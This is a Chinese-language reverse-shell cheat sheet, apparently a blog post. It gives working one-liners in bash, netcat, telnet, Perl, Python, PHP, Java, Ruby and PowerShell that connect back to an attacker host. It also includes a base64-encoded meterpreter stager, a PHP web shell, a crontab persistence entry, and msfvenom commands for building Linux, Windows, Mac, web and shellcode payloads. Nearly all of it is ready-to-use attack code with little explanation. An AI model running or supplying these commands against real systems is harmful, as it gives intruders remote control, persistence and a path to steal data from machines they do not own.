反彈shell與生成shell

 

反彈shell

0x01 bash 版本:

  • bash -i >& /dev/tcp/attackerip/1234 0>&1

注意這個是由解析 shell 的 bash 完成,所以某些情況下不支持。我用 zsh 不能反彈。這個也是最常用的。

0x02 nc 版本:

支持 - e 選項

  • nc -e /bin/sh attackerip 1234

這個方式最簡單
不能使用 - e 選項時:

 

  • mknod backpipe p && nc attackerip 8080 0<backpipe | /bin/bash 1>backpipe
  • /bin/sh | nc attackerip 4444
  • rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/

 

安裝的 NC 版本有問題時:

  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip 1234 >/tmp/f

0x03 Telnet 版本:(nc 不可用或 / dev/tcp 不可用時)

  • mknod backpipe p && telnet attackerip 8080 0<backpipe | /bin/bash 1>backpipe

 

0x04 Perl 版本:

  • perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

 

不依賴於 / bin/sh 的 shell: *** 這條語句比上面的更爲簡短,而且確實不需要依賴 / bin/sh

  • perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

0x05 Python 版本:

  • python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

另外的形式:

  • python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('127.0.0.1',9000))
  • while 1: proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"

另外 Metasploit 版的代碼:

  • msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=192.168.90.1 LPORT=1234
  • import base64; exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMTkyLjE2OC45MC4xJywxMjM0KSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdig0MDk2KQp3aGlsZSBsZW4oZCkhPWw6CglkKz1zLnJlY3YoNDA5NikKZXhlYyhkLHsncyc6c30pCg=='))

0x06 php 版本:

  • php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
  •  
  • <?php
  • exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.40/4444 0>&1'");
  • ?>
  •  
  • <?php system($_GET['cmd']);?>
  • <? phpinfo(); ?>
  •  
  • use system rather than exec or passthru or shell_exec

0x07 java 版本:

  • r = Runtime.getRuntime()
  • p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
  • p.waitFor()

0x08 ruby 版本:

  • ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

不依賴於 / bin/sh 的 shell:

  • ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r")io|c.print io.readend'

如果目標系統運行 Windows:

  • ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r")io|c.print io.readend'

0x09 crontab 定時任務:

這也是在 redis 未授權訪問的時候使用過的。
crontab -e 編輯當前用戶的任務,或者是寫到計劃任務目錄,一般是 / var/spool/cron / 目錄,ubuntu 是 / var/spool/cron/crontabs。文件名爲用戶名 root 等。下面命令含義是每一分鐘執行一次反彈 shell 命令。具體 crontab 用法可以參考 Crontab 定時任務配置

  • * * * * * /bin/bash -i >& /dev/tcp/attackerip/1234 0>&1

0x10 One Line Powershell版本:

 

  • powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -command "$client = New-Object System.Net.Sockets.TCPClient('182.148.157.242',5000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

 

生成shell

Linux

  • msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> m -f elf > shell.elf

Windows

  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> m -f exe > shell.exe

Mac

  • msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

Web Payloads

PHP

  • msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
  • cat shell.php | pbcopy && echo '<?php ' | tr -d '
  • ' > shell.php && pbpaste >> shell.php

ASP

  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP

  • msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR

  • msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

Scripting Payloads

Python

  • msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash

  • msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl

  • msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

Shellcode

For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

Linux Based Shellcode

  • msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Windows Based Shellcode

  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Mac Based Shellcode

  • msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章